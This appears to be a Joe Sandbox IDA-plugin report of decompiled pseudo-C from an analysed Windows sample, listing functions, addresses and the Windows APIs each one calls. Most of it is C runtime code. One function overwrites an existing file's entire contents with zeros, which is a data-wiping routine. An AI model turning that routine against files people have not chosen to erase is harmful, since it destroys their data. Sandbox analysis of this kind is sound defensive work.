								_t54 = 0x149eba;
								 *0x14a0c2 = _t28;
								_t38 = GetModuleFileNameW(_t40, 0x149eba, 0x104);
								_t40 = 0x2fb;
								if(_t38 == 0) {
									_t39 = E00143B54(0x149eba, 0x2fb, L"<program name unknown>");
									_t57 = _t57 + 0xc;
									if(_t39 != 0) {
										L8:
										_push(0);
										_push(0);
										_push(0);
										_push(0);
										_push(0);
										L9:
										E00143464();
									}
								}
							}
							if(E00143B39(_t54) + 1 > 0x3c) {
								_t40 = _t40 - (0x149e44 + E00143B39(_t54) * 2 - _t54 >> 1);
								_t37 = E00143A6C(0x149e44 + E00143B39(_t54) * 2, _t40, L"...", 3);
								_t57 = _t57 + 0x14;
								if(_t37 != 0) {
									goto L8;
								}
							}
							_t54 = 0x314;
							_t32 = E001439F7(_t53, 0x314, L"\n\n");
							_t57 = _t57 + 0xc;
							if(_t32 != 0) {
								goto L8;
							}
							_t34 = E001439F7(_t53, 0x314, _v512);
							_t57 = _t57 + 0xc;
							if(_t34 != 0) {
								goto L8;
							}
							_t20 = E0014388B(_t52, _t53, L"Microsoft Visual C++ Runtime Library", 0x12010);
						}
					}
				}
				return E001417EA(_t20, _t40, _v8 ^ _t55, _t52, _t53, _t54);
			}

























    0x00141e00
    0x00141e0b
    0x00141e12
    0x00141e17
    0x00141e21
    0x00141e23
    0x00141e26
    0x00141e2e
    0x00141e3f
    0x00141f54
    0x00141f58
    0x00141f5f
    0x00141f61
    0x00141f64
    0x00141f6f
    0x00000000
    0x00000000
    0x00141f71
    0x00141f77
    0x00000000
    0x00000000
    0x00000000
    0x00141f77
    0x00141f88
    0x00141f9a
    0x00141f9a
    0x00141e5e
    0x00141e64
    0x00141e74
    0x00141e7a
    0x00141e7f
    0x00141e84
    0x00141f42
    0x00141f43
    0x00141f44
    0x00141f45
    0x00141f46
    0x00000000
    0x00141e8a
    0x00141e8f
    0x00141e96
    0x00141e9c
    0x00141ea2
    0x00141ea9
    0x00141eb2
    0x00141eb7
    0x00141ebc
    0x00141ebe
    0x00141ec0
    0x00141ec1
    0x00141ec2
    0x00141ec3
    0x00141ec4
    0x00141ec5
    0x00141ec5
    0x00141ec5
    0x00141ebc
    0x00141ea9
    0x00141ed5
    0x00141ef1
    0x00141ef5
    0x00141efa
    0x00141eff
    0x00000000
    0x00000000
    0x00141eff
    0x00141f06
    0x00141f0d
    0x00141f12
    0x00141f17
    0x00000000
    0x00000000
    0x00141f21
    0x00141f26
    0x00141f2b
    0x00000000
    0x00000000
    0x00141f38
    0x00141f3d
    0x00141e64
    0x00141e3f
    0x00141fae

    APIs
    • GetModuleFileNameW.KERNEL32(00000000,00149EBA,00000104), ref: 00141E9C
      • Part of subcall function 00143464: GetCurrentProcess.KERNEL32(C0000417), ref: 0014347A
      • Part of subcall function 00143464: TerminateProcess.KERNEL32(00000000), ref: 00143481
    • _wcslen.LIBCMT ref: 00141ECB
    • _wcslen.LIBCMT ref: 00141ED8
      • Part of subcall function 0014388B: LoadLibraryW.KERNEL32(USER32.DLL), ref: 001438C6
      • Part of subcall function 0014388B: GetProcAddress.KERNEL32(00000000,MessageBoxW), ref: 001438E2
      • Part of subcall function 0014388B: EncodePointer.KERNEL32(00000000), ref: 001438F3
      • Part of subcall function 0014388B: GetProcAddress.KERNEL32(00000000,GetActiveWindow), ref: 00143900
      • Part of subcall function 0014388B: EncodePointer.KERNEL32(00000000), ref: 00143903
      • Part of subcall function 0014388B: GetProcAddress.KERNEL32(00000000,GetLastActivePopup), ref: 00143910
      • Part of subcall function 0014388B: EncodePointer.KERNEL32(00000000), ref: 00143913
      • Part of subcall function 0014388B: GetProcAddress.KERNEL32(00000000,GetUserObjectInformationW), ref: 00143920
      • Part of subcall function 0014388B: EncodePointer.KERNEL32(00000000), ref: 00143923
      • Part of subcall function 0014388B: GetProcAddress.KERNEL32(00000000,GetProcessWindowStation), ref: 00143934
      • Part of subcall function 0014388B: EncodePointer.KERNEL32(00000000), ref: 00143937
      • Part of subcall function 0014388B: DecodePointer.KERNEL32(00000000,00149E88,00000314,00000000), ref: 00143959
      • Part of subcall function 0014388B: DecodePointer.KERNEL32 ref: 00143963
      • Part of subcall function 0014388B: DecodePointer.KERNEL32(?,00149E88,00000314,00000000), ref: 001439A2
      • Part of subcall function 0014388B: DecodePointer.KERNEL32(?), ref: 001439BC
      • Part of subcall function 0014388B: DecodePointer.KERNEL32(00149E88,00000314,00000000), ref: 001439D0
    • GetStdHandle.KERNEL32(000000F4), ref: 00141F4E
    • _strlen.LIBCMT ref: 00141F8B
    • WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 00141F9A
      • Part of subcall function 001417EA: IsDebuggerPresent.KERNEL32 ref: 00141A54
      • Part of subcall function 001417EA: SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00141A69
      • Part of subcall function 001417EA: UnhandledExceptionFilter.KERNEL32(001461B8), ref: 00141A74
      • Part of subcall function 001417EA: GetCurrentProcess.KERNEL32(C0000409), ref: 00141A90
      • Part of subcall function 001417EA: TerminateProcess.KERNEL32(00000000), ref: 00141A97
    Strings
    Memory Dump Source
    • Source File: 00000004.00000002.1614501937.00141000.00000020.sdmp, Offset: 00140000, based on PE: true
    • Associated: 00000004.00000002.1614314625.00140000.00000002.sdmp
    • Associated: 00000004.00000002.1614616974.00146000.00000002.sdmp
    • Associated: 00000004.00000002.1614637142.00149000.00000004.sdmp
    • Associated: 00000004.00000002.1614656158.0014B000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_140000__usm.jbxd
    Function 0014117C, Relevance: 15.1, APIs: 10, Instructions: 115file
    C-Code - Quality: 81%
    			E0014117C(WCHAR* __ecx, void* __edx) {
				signed int _v8;
				void _v4108;
				struct _OVERLAPPED* _v4112;
				struct _OVERLAPPED* _v4116;
				long _v4120;
				struct _OVERLAPPED* _v4124;
				long _v4128;
				long _v4136;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t28;
				long _t37;
				long _t40;
				int _t43;
				long _t46;
				long _t48;
				WCHAR* _t50;
				void* _t51;
				long _t53;
				long _t54;
				void* _t57;
				long* _t58;
				signed int _t60;

				_t57 = __edx;
				E00145B90(0x102c);
				_t28 =  *0x149004; // 0x20251455
				_v8 = _t28 ^ _t60;
				_t58 =  &_v4120;
				_v4124 = 0;
				asm("stosd");
				_t50 = __ecx;
				_v4128 = 0;
				_v4116 = 0;
				_v4112 = 0;
				E00144DA0( &_v4108, 0, 0x1000);
				_t51 = CreateFileW(_t50, 0x40000000, 0, 0, 3, 0x80, 0);
				if(_t51 != 0xffffffff) {
					_t58 = SetFilePointer;
					SetFilePointer(_t51, 0xffffffff, 0, 2);
					_t37 = WriteFile(_t51,  &_v4108, 1,  &_v4128, 0);
					__eflags = _t37;
					if(_t37 != 0) {
						FlushFileBuffers(_t51);
					}
					__imp__GetFileSizeEx(_t51,  &_v4124);
					SetFilePointer(_t51, 0, 0, 0);
					_t40 = _v4120;
					_t53 = _v4124;
					__eflags = _t40;
					if(_t40 >= 0) {
						goto L8;
					} else {
						__eflags = _t53;
						if(_t53 > 0) {
							goto L8;
							do {
								while(1) {
									L8:
									_t54 = _t53 - _v4116;
									__eflags = _t54;
									asm("sbb eax, [ebp-0x100c]");
									_v4136 = _t40;
									if(_t54 != 0) {
										goto L10;
									}
									__eflags = _t54 - 0x1000;
									if(_t54 > 0x1000) {
										goto L10;
									}
									L11:
									_t43 = WriteFile(_t51,  &_v4108, _t54,  &_v4128, 0);
									__eflags = _t43;
									if(_t43 != 0) {
										_t48 = _v4128;
										__eflags = _t48;
										if(_t48 != 0) {
											_v4116 = _v4116 + _t48;
											_t40 = _v4120;
											asm("adc [ebp-0x100c], esi");
											__eflags = _v4112 - _t40;
											if(__eflags < 0) {
												_t53 = _v4124;
												continue;
											} else {
												if(__eflags <= 0) {
													break;
												}
											}
										}
									}
									goto L16;
									L10:
									_t54 = 0x1000;
									goto L11;
								}
								_t53 = _v4124;
								__eflags = _v4116 - _t53;
							} while (_v4116 <= _t53);
						}
					}
					L16:
					FlushFileBuffers(_t51);
					CloseHandle(_t51);
					_t46 = 0;
					__eflags = 0;
				} else {
					_t46 = GetLastError();
				}
				return E001417EA(_t46, _t51, _v8 ^ _t60, _t57, _t58, 0);
			}



























    0x0014117c
    0x00141184
    0x00141189
    0x00141190
    0x0014119a
    0x001411a5
    0x001411ab
    0x001411b4
    0x001411b6
    0x001411bc
    0x001411c2
    0x001411c8
    0x001411e6
    0x001411eb
    0x001411f8
    0x00141204
    0x00141218
    0x0014121e
    0x00141220
    0x00141223
    0x00141223
    0x00141231
    0x0014123b
    0x0014123d
    0x00141243
    0x00141249
    0x0014124b
    0x00000000
    0x0014124d
    0x0014124d
    0x0014124f
    0x00141251
    0x00141259
    0x00141259
    0x00141259
    0x00141259
    0x00141259
    0x0014125f
    0x00141265
    0x0014126b
    0x00000000
    0x00000000
    0x0014126d
    0x00141273
    0x00000000
    0x00000000
    0x0014127a
    0x0014128b
    0x00141291
    0x00141293
    0x00141295
    0x0014129b
    0x0014129d
    0x0014129f
    0x001412a5
    0x001412ab
    0x001412b1
    0x001412b7
    0x00141253
    0x00000000
    0x001412b9
    0x001412b9
    0x00000000
    0x00000000
    0x001412b9
    0x001412b7
    0x0014129d
    0x00000000
    0x00141275
    0x00141275
    0x00000000
    0x00141275
    0x001412bb
    0x001412c1
    0x001412c1
    0x00141259
    0x0014124f
    0x001412c9
    0x001412ca
    0x001412d1
    0x001412d7
    0x001412d7
    0x001411ed
    0x001411ed
    0x001411ed
    0x001412e7

    APIs
    • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,00000080,00000000), ref: 001411E0
    • GetLastError.KERNEL32(?,40000000,00000000,00000000,00000003,00000080,00000000,76F881EF,?,00141584), ref: 001411ED
    • SetFilePointer.KERNEL32(00000000,000000FF,00000000,00000002,?,40000000,00000000,00000000,00000003,00000080,00000000,76F881EF,?,00141584), ref: 00141204
    • WriteFile.KERNEL32(00000000,?,00000001,?,00000000), ref: 00141218
    • FlushFileBuffers.KERNEL32(00000000), ref: 00141223
    • GetFileSizeEx.KERNEL32(00000000,?,?,40000000,00000000,00000000,00000003,00000080,00000000,76F881EF,?,00141584), ref: 00141231
    • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,?,40000000,00000000,00000000,00000003,00000080,00000000,76F881EF,?,00141584), ref: 0014123B
    • WriteFile.KERNEL32(00000000,?,00001000,?,00000000), ref: 0014128B
    • FlushFileBuffers.KERNEL32(00000000), ref: 001412CA
    • CloseHandle.KERNEL32(00000000), ref: 001412D1
      • Part of subcall function 001417EA: IsDebuggerPresent.KERNEL32 ref: 00141A54
      • Part of subcall function 001417EA: SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00141A69
      • Part of subcall function 001417EA: UnhandledExceptionFilter.KERNEL32(001461B8), ref: 00141A74
      • Part of subcall function 001417EA: GetCurrentProcess.KERNEL32(C0000409), ref: 00141A90
      • Part of subcall function 001417EA: TerminateProcess.KERNEL32(00000000), ref: 00141A97
    Memory Dump Source
    • Source File: 00000004.00000002.1614501937.00141000.00000020.sdmp, Offset: 00140000, based on PE: true
    • Associated: 00000004.00000002.1614314625.00140000.00000002.sdmp
    • Associated: 00000004.00000002.1614616974.00146000.00000002.sdmp
    • Associated: 00000004.00000002.1614637142.00149000.00000004.sdmp
    • Associated: 00000004.00000002.1614656158.0014B000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_140000__usm.jbxd
    Function 00144E56, Relevance: 12.2, APIs: 8, Instructions: 190
    C-Code - Quality: 79%
    			E00144E56(intOrPtr* _a4, int _a8, signed int _a12, char* _a16, int _a20, short* _a24, int _a28, int _a32, intOrPtr _a36) {
				signed int _v8;
				int _v12;
				int _v16;
				int _v20;
				void* _v32;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t67;
				int _t73;
				short* _t75;
				short* _t77;
				short* _t78;
				signed int _t81;
				void* _t83;
				int _t84;
				int _t86;
				signed int _t88;
				void* _t90;
				short* _t91;
				char* _t96;
				int _t99;
				signed int _t108;
				signed int _t109;
				int _t112;
				signed int _t113;
				signed int _t115;
				int _t116;

				_t67 =  *0x149004; // 0x20251455
				_v8 = _t67 ^ _t115;
				_t109 = _a20;
				if(_t109 <= 0) {
					L8:
					_v12 = 0;
					if(_a32 == 0) {
						_a32 =  *((intOrPtr*)( *_a4 + 4));
					}
					_t114 = MultiByteToWideChar;
					_t112 = MultiByteToWideChar(_a32, 1 + (0 | _a36 != 0x00000000) * 8, _a16, _a20, 0, 0);
					_v20 = _t112;
					if(_t112 != 0) {
						if(__eflags <= 0) {
							L21:
							_v16 = 0;
							L22:
							__eflags = _v16;
							if(_v16 == 0) {
								goto L11;
							}
							_t75 = MultiByteToWideChar(_a32, 1, _a16, _a20, _v16, _t112);
							__eflags = _t75;
							if(_t75 == 0) {
								L45:
								E00144D71(_v16);
								_t73 = _v12;
								goto L46;
							}
							_t114 = LCMapStringW;
							_t77 = LCMapStringW(_a8, _a12, _v16, _t112, 0, 0);
							_v12 = _t77;
							__eflags = _t77;
							if(_t77 == 0) {
								goto L45;
							}
							__eflags = _a12 & 0x00000400;
							if((_a12 & 0x00000400) == 0) {
								_t113 = _v12;
								__eflags = _t113;
								if(_t113 <= 0) {
									L37:
									_t112 = 0;
									__eflags = 0;
									L38:
									__eflags = _t112;
									if(_t112 != 0) {
										_t78 = LCMapStringW(_a8, _a12, _v16, _v20, _t112, _v12);
										__eflags = _t78;
										if(_t78 != 0) {
											_push(0);
											_push(0);
											__eflags = _a28;
											if(_a28 != 0) {
												_push(_a28);
												_push(_a24);
											} else {
												_push(0);
												_push(0);
											}
											_v12 = WideCharToMultiByte(_a32, 0, _t112, _v12, ??, ??, ??, ??);
										}
										E00144D71(_t112);
									}
									goto L45;
								}
								_t81 = 0xffffffe0;
								_t109 = _t81 % _t113;
								__eflags = _t81 / _t113 - 2;
								if(_t81 / _t113 < 2) {
									goto L37;
								}
								_t83 = _t113 + _t113 + 8;
								__eflags = _t83 - 0x400;
								if(_t83 > 0x400) {
									_t84 = E001451AA(_t109, _t113, LCMapStringW, _t83);
									__eflags = _t84;
									if(_t84 != 0) {
										 *_t84 = 0xdddd;
										_t84 = _t84 + 8;
										__eflags = _t84;
									}
									_t112 = _t84;
									goto L38;
								}
								E00145AA0(_t83);
								_t112 = _t116;
								__eflags = _t112;
								if(_t112 == 0) {
									goto L45;
								}
								 *_t112 = 0xcccc;
								_t112 = _t112 + 8;
								goto L38;
							}
							_t86 = _a28;
							__eflags = _t86;
							if(_t86 != 0) {
								__eflags = _v12 - _t86;
								if(_v12 <= _t86) {
									LCMapStringW(_a8, _a12, _v16, _t112, _a24, _t86);
								}
							}
							goto L45;
						}
						_t88 = 0xffffffe0;
						_t109 = _t88 % _t112;
						__eflags = _t88 / _t112 - 2;
						if(_t88 / _t112 < 2) {
							goto L21;
						}
						_t24 = _t112 + 8; // 0x8
						_t90 = _t112 + _t24;
						__eflags = _t90 - 0x400;
						if(_t90 > 0x400) {
							_t91 = E001451AA(_t109, _t112, MultiByteToWideChar, _t90);
							__eflags = _t91;
							if(_t91 == 0) {
								L20:
								_v16 = _t91;
								goto L22;
							}
							 *_t91 = 0xdddd;
							L19:
							_t91 =  &(_t91[4]);
							__eflags = _t91;
							goto L20;
						}
						E00145AA0(_t90);
						_t91 = _t116;
						__eflags = _t91;
						if(_t91 == 0) {
							goto L20;
						}
						 *_t91 = 0xcccc;
						goto L19;
					} else {
						L11:
						_t73 = 0;
						L46:
						return E001417EA(_t73, 0, _v8 ^ _t115, _t109, _t112, _t114);
					}
				} else {
					_t96 = _a16;
					_t108 = _t109;
					while(1) {
						_t108 = _t108 - 1;
						if( *_t96 == 0) {
							break;
						}
						_t96 =  &(_t96[1]);
						if(_t108 != 0) {
							continue;
						} else {
							_t108 = _t108 | 0xffffffff;
							break;
						}
					}
					_t99 = _t109 - _t108 - 1;
					if(_t99 < _t109) {
						_t99 = _t99 + 1;
					}
					_a20 = _t99;
					goto L8;
				}
			}































    0x00144e5e
    0x00144e65
    0x00144e68
    0x00144e72
    0x00144e93
    0x00144e93
    0x00144e99
    0x00144ea3
    0x00144ea3
    0x00144ea6
    0x00144ec9
    0x00144ecb
    0x00144ed0
    0x00144ed9
    0x00144f1e
    0x00144f1e
    0x00144f21
    0x00144f21
    0x00144f24
    0x00000000
    0x00000000
    0x00144f35
    0x00144f37
    0x00144f39
    0x0014501f
    0x00145022
    0x00145027
    0x00000000
    0x0014502a
    0x00144f3f
    0x00144f51
    0x00144f53
    0x00144f56
    0x00144f58
    0x00000000
    0x00000000
    0x00144f63
    0x00144f66
    0x00144f91
    0x00144f94
    0x00144f96
    0x00144fda
    0x00144fda
    0x00144fda
    0x00144fdc
    0x00144fdc
    0x00144fde
    0x00144ff0
    0x00144ff2
    0x00144ff4
    0x00144ff6
    0x00144ff7
    0x00144ff8
    0x00144ffb
    0x00145001
    0x00145004
    0x00144ffd
    0x00144ffd
    0x00144ffe
    0x00144ffe
    0x00145015
    0x00145015
    0x00145019
    0x0014501e
    0x00000000
    0x00144fde
    0x00144f9c
    0x00144f9d
    0x00144f9f
    0x00144fa2
    0x00000000
    0x00000000
    0x00144fa4
    0x00144fa8
    0x00144faa
    0x00144fc3
    0x00144fc9
    0x00144fcb
    0x00144fcd
    0x00144fd3
    0x00144fd3
    0x00144fd3
    0x00144fd6
    0x00000000
    0x00144fd6
    0x00144fac
    0x00144fb1
    0x00144fb3
    0x00144fb5
    0x00000000
    0x00000000
    0x00144fb7
    0x00144fbd
    0x00000000
    0x00144fbd
    0x00144f68
    0x00144f6b
    0x00144f6d
    0x00144f73
    0x00144f76
    0x00144f8a
    0x00144f8a
    0x00144f76
    0x00000000
    0x00144f6d
    0x00144edf
    0x00144ee0
    0x00144ee2
    0x00144ee5
    0x00000000
    0x00000000
    0x00144ee7
    0x00144ee7
    0x00144eeb
    0x00144ef0
    0x00144f06
    0x00144f0c
    0x00144f0e
    0x00144f19
    0x00144f19
    0x00000000
    0x00144f19
    0x00144f10
    0x00144f16
    0x00144f16
    0x00144f16
    0x00000000
    0x00144f16
    0x00144ef2
    0x00144ef7
    0x00144ef9
    0x00144efb
    0x00000000
    0x00000000
    0x00144efd
    0x00000000
    0x00144ed2
    0x00144ed2
    0x00144ed2
    0x0014502b
    0x0014503c
    0x0014503c
    0x00144e74
    0x00144e74
    0x00144e77
    0x00144e79
    0x00144e79
    0x00144e7c
    0x00000000
    0x00000000
    0x00144e7e
    0x00144e81
    0x00000000
    0x00144e83
    0x00144e83
    0x00000000
    0x00144e83
    0x00144e81
    0x00144e8a
    0x00144e8d
    0x00144e8f
    0x00144e8f
    0x00144e90
    0x00000000
    0x00144e90

    APIs
    • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000100,?,00000000,?,?,?,?,?,?,?), ref: 00144EC7
    • MultiByteToWideChar.KERNEL32(?,00000001,?,?,?,00000000), ref: 00144F35
    • LCMapStringW.KERNEL32(?,?,?,00000000,00000000,00000000), ref: 00144F51
    • LCMapStringW.KERNEL32(?,?,?,00000000,?,?), ref: 00144F8A
      • Part of subcall function 001451AA: HeapAlloc.KERNEL32(00000000,00000001,00000001,00000000,00000000,?,00144479,?,00000001,?,?,00143061,00000018,00147C50,0000000C,001430F1), ref: 001451EF
    • LCMapStringW.KERNEL32(?,?,?,?,00000000,?), ref: 00144FF0
    • WideCharToMultiByte.KERNEL32(?,00000000,00000000,?,?,?,00000000,00000000), ref: 0014500F
    • __freea.LIBCMT ref: 00145019
    • __freea.LIBCMT ref: 00145022
      • Part of subcall function 001417EA: IsDebuggerPresent.KERNEL32 ref: 00141A54
      • Part of subcall function 001417EA: SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00141A69
      • Part of subcall function 001417EA: UnhandledExceptionFilter.KERNEL32(001461B8), ref: 00141A74
      • Part of subcall function 001417EA: GetCurrentProcess.KERNEL32(C0000409), ref: 00141A90
      • Part of subcall function 001417EA: TerminateProcess.KERNEL32(00000000), ref: 00141A97
    Memory Dump Source
    • Source File: 00000004.00000002.1614501937.00141000.00000020.sdmp, Offset: 00140000, based on PE: true
    • Associated: 00000004.00000002.1614314625.00140000.00000002.sdmp
    • Associated: 00000004.00000002.1614616974.00146000.00000002.sdmp
    • Associated: 00000004.00000002.1614637142.00149000.00000004.sdmp
    • Associated: 00000004.00000002.1614656158.0014B000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_140000__usm.jbxd
    Function 001445D6, Relevance: 12.1, APIs: 8, Instructions: 61
    C-Code - Quality: 100%
    			E001445D6(LONG* _a4) {
				LONG* _t16;
				LONG* _t17;
				LONG* _t18;
				LONG* _t19;
				LONG* _t20;
				LONG* _t21;
				LONG** _t32;
				LONG* _t34;

				_t34 = _a4;
				if(_t34 == 0) {
					L18:
					return _t34;
				}
				InterlockedDecrement(_t34);
				_t2 =  &(_t34[0x2c]); // 0x8dc10b10
				_t16 =  *_t2;
				if(_t16 != 0) {
					InterlockedDecrement(_t16);
				}
				_t3 =  &(_t34[0x2e]); // 0x9320b9ab
				_t17 =  *_t3;
				if(_t17 != 0) {
					InterlockedDecrement(_t17);
				}
				_t4 =  &(_t34[0x2d]); // 0xabab107e
				_t18 =  *_t4;
				if(_t18 != 0) {
					InterlockedDecrement(_t18);
				}
				_t5 =  &(_t34[0x30]); // 0x1c468d0c
				_t19 =  *_t5;
				if(_t19 != 0) {
					InterlockedDecrement(_t19);
				}
				_t6 =  &(_t34[0x14]); // 0x143ce0
				_t32 = _t6;
				_a4 = 6;
				do {
					if( *((intOrPtr*)(_t32 - 8)) != 0x149840) {
						_t20 =  *_t32;
						if(_t20 != 0) {
							InterlockedDecrement(_t20);
						}
					}
					if( *((intOrPtr*)(_t32 - 4)) != 0) {
						_t10 =  &(_t32[1]); // 0xc35d10c4
						_t21 =  *_t10;
						if(_t21 != 0) {
							InterlockedDecrement(_t21);
						}
					}
					_t32 =  &(_t32[4]);
					_t11 =  &_a4;
					 *_t11 = _a4 - 1;
				} while ( *_t11 != 0);
				_t13 =  &(_t34[0x35]); // 0x11d868d
				InterlockedDecrement( *_t13 + 0xb4);
				goto L18;
			}











    0x001445dc
    0x001445e1
    0x0014466a
    0x0014466e
    0x0014466e
    0x001445f0
    0x001445f2
    0x001445f2
    0x001445fa
    0x001445fd
    0x001445fd
    0x001445ff
    0x001445ff
    0x00144607
    0x0014460a
    0x0014460a
    0x0014460c
    0x0014460c
    0x00144614
    0x00144617
    0x00144617
    0x00144619
    0x00144619
    0x00144621
    0x00144624
    0x00144624
    0x00144626
    0x00144626
    0x00144629
    0x00144630
    0x00144637
    0x00144639
    0x0014463d
    0x00144640
    0x00144640
    0x0014463d
    0x00144646
    0x00144648
    0x00144648
    0x0014464d
    0x00144650
    0x00144650
    0x0014464d
    0x00144652
    0x00144655
    0x00144655
    0x00144655
    0x0014465a
    0x00144666
    0x00000000

    APIs
    • InterlockedDecrement.KERNEL32(00143C90), ref: 001445F0
    • InterlockedDecrement.KERNEL32(8DC10B10), ref: 001445FD
    • InterlockedDecrement.KERNEL32(9320B9AB), ref: 0014460A
    • InterlockedDecrement.KERNEL32(ABAB107E), ref: 00144617
    • InterlockedDecrement.KERNEL32(1C468D0C), ref: 00144624
    • InterlockedDecrement.KERNEL32(1C468D0C), ref: 00144640
    • InterlockedDecrement.KERNEL32(C35D10C4), ref: 00144650
    • InterlockedDecrement.KERNEL32(011D85D9), ref: 00144666
    Memory Dump Source
    • Source File: 00000004.00000002.1614501937.00141000.00000020.sdmp, Offset: 00140000, based on PE: true
    • Associated: 00000004.00000002.1614314625.00140000.00000002.sdmp
    • Associated: 00000004.00000002.1614616974.00146000.00000002.sdmp
    • Associated: 00000004.00000002.1614637142.00149000.00000004.sdmp
    • Associated: 00000004.00000002.1614656158.0014B000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_140000__usm.jbxd
    Function 00144547, Relevance: 12.1, APIs: 8, Instructions: 58
    C-Code - Quality: 100%
    			E00144547(LONG* _a4) {
				LONG* _t15;
				LONG* _t16;
				LONG* _t17;
				LONG* _t18;
				LONG* _t19;
				LONG* _t20;
				long* _t30;
				LONG* _t31;

				_t31 = _a4;
				InterlockedIncrement(_t31);
				_t15 = _t31[0x2c];
				if(_t15 != 0) {
					InterlockedIncrement(_t15);
				}
				_t16 = _t31[0x2e];
				if(_t16 != 0) {
					InterlockedIncrement(_t16);
				}
				_t17 = _t31[0x2d];
				if(_t17 != 0) {
					InterlockedIncrement(_t17);
				}
				_t18 = _t31[0x30];
				if(_t18 != 0) {
					InterlockedIncrement(_t18);
				}
				_t30 =  &(_t31[0x14]);
				_a4 = 6;
				do {
					if( *((intOrPtr*)(_t30 - 8)) != 0x149840) {
						_t19 =  *_t30;
						if(_t19 != 0) {
							InterlockedIncrement(_t19);
						}
					}
					if( *((intOrPtr*)(_t30 - 4)) != 0) {
						_t20 = _t30[1];
						if(_t20 != 0) {
							InterlockedIncrement(_t20);
						}
					}
					_t30 =  &(_t30[4]);
					_t11 =  &_a4;
					 *_t11 = _a4 - 1;
				} while ( *_t11 != 0);
				return InterlockedIncrement(_t31[0x35] + 0xb4);
			}











    0x00144555
    0x00144559
    0x0014455b
    0x00144563
    0x00144566
    0x00144566
    0x00144568
    0x00144570
    0x00144573
    0x00144573
    0x00144575
    0x0014457d
    0x00144580
    0x00144580
    0x00144582
    0x0014458a
    0x0014458d
    0x0014458d
    0x0014458f
    0x00144592
    0x00144599
    0x001445a0
    0x001445a2
    0x001445a6
    0x001445a9
    0x001445a9
    0x001445a6
    0x001445af
    0x001445b1
    0x001445b6
    0x001445b9
    0x001445b9
    0x001445b6
    0x001445bb
    0x001445be
    0x001445be
    0x001445be
    0x001445d5

    APIs
    • InterlockedIncrement.KERNEL32(?), ref: 00144559
    • InterlockedIncrement.KERNEL32(?), ref: 00144566
    • InterlockedIncrement.KERNEL32(?), ref: 00144573
    • InterlockedIncrement.KERNEL32(?), ref: 00144580
    • InterlockedIncrement.KERNEL32(?), ref: 0014458D
    • InterlockedIncrement.KERNEL32(?), ref: 001445A9
    • InterlockedIncrement.KERNEL32(00000000), ref: 001445B9
    • InterlockedIncrement.KERNEL32(?), ref: 001445CF
    Memory Dump Source
    • Source File: 00000004.00000002.1614501937.00141000.00000020.sdmp, Offset: 00140000, based on PE: true
    • Associated: 00000004.00000002.1614314625.00140000.00000002.sdmp
    • Associated: 00000004.00000002.1614616974.00146000.00000002.sdmp
    • Associated: 00000004.00000002.1614637142.00149000.00000004.sdmp
    • Associated: 00000004.00000002.1614656158.0014B000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_140000__usm.jbxd
    Function 00144217, Relevance: 7.6, APIs: 5, Instructions: 116
    C-Code - Quality: 96%
    			E00144217(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t47;
				signed int _t52;
				signed int _t61;
				signed int _t62;
				signed int _t63;
				long _t64;
				LONG* _t67;
				LONG* _t73;
				intOrPtr _t89;
				intOrPtr _t97;
				void* _t98;
				void* _t101;

				_t101 = __eflags;
				_t87 = __edx;
				_push(0x14);
				_push(0x147cf0);
				E00142C80(__ebx, __edi, __esi);
				 *(_t98 - 0x20) =  *(_t98 - 0x20) | 0xffffffff;
				_t89 = E0014299A(__ebx, _t101);
				 *((intOrPtr*)(_t98 - 0x24)) = _t89;
				E00143F0B(__ebx, __edx, _t89, __esi, _t101);
				_t47 = E00143FB2( *((intOrPtr*)(_t98 + 8)));
				 *((intOrPtr*)(_t98 + 8)) = _t47;
				if(_t47 ==  *((intOrPtr*)( *(_t89 + 0x68) + 4))) {
					_t41 = _t98 - 0x20;
					 *_t41 =  *(_t98 - 0x20) & 0x00000000;
					__eflags =  *_t41;
					L26:
					return E00142CC5( *(_t98 - 0x20));
				}
				_t73 = E00144468(0x220);
				_t103 = _t73;
				if(_t73 == 0) {
					goto L26;
				}
				memcpy(_t73,  *(_t89 + 0x68), 0x88 << 2);
				 *_t73 =  *_t73 & 0x00000000;
				_t52 = E0014402E(0, _t87, _t103,  *((intOrPtr*)(_t98 + 8)), _t73);
				 *(_t98 - 0x20) = _t52;
				if(_t52 != 0) {
					__eflags = _t52 - 0xffffffff;
					if(_t52 == 0xffffffff) {
						__eflags = _t73 - 0x149320;
						if(__eflags != 0) {
							E001443CF(_t73);
						}
						 *((intOrPtr*)(E0014353F(__eflags))) = 0x16;
					}
				} else {
					_t97 =  *((intOrPtr*)(_t98 - 0x24));
					if(InterlockedDecrement( *(_t97 + 0x68)) == 0) {
						_t69 =  *(_t97 + 0x68);
						if( *(_t97 + 0x68) != 0x149320) {
							E001443CF(_t69);
						}
					}
					 *(_t97 + 0x68) = _t73;
					InterlockedIncrement(_t73);
					if(( *(_t97 + 0x70) & 0x00000002) == 0 && ( *0x149aa0 & 0x00000001) == 0) {
						E001430D6(_t73, InterlockedIncrement, 0xd);
						 *(_t98 - 4) =  *(_t98 - 4) & 0x00000000;
						 *0x14a768 = _t73[1];
						 *0x14a76c = _t73[2];
						 *0x14a770 = _t73[3];
						_t61 = 0;
						while(1) {
							 *(_t98 - 0x1c) = _t61;
							if(_t61 >= 5) {
								break;
							}
							 *((short*)(0x14a75c + _t61 * 2)) =  *((intOrPtr*)(_t73 + 0x10 + _t61 * 2));
							_t61 = _t61 + 1;
						}
						_t62 = 0;
						__eflags = 0;
						while(1) {
							 *(_t98 - 0x1c) = _t62;
							__eflags = _t62 - 0x101;
							if(_t62 >= 0x101) {
								break;
							}
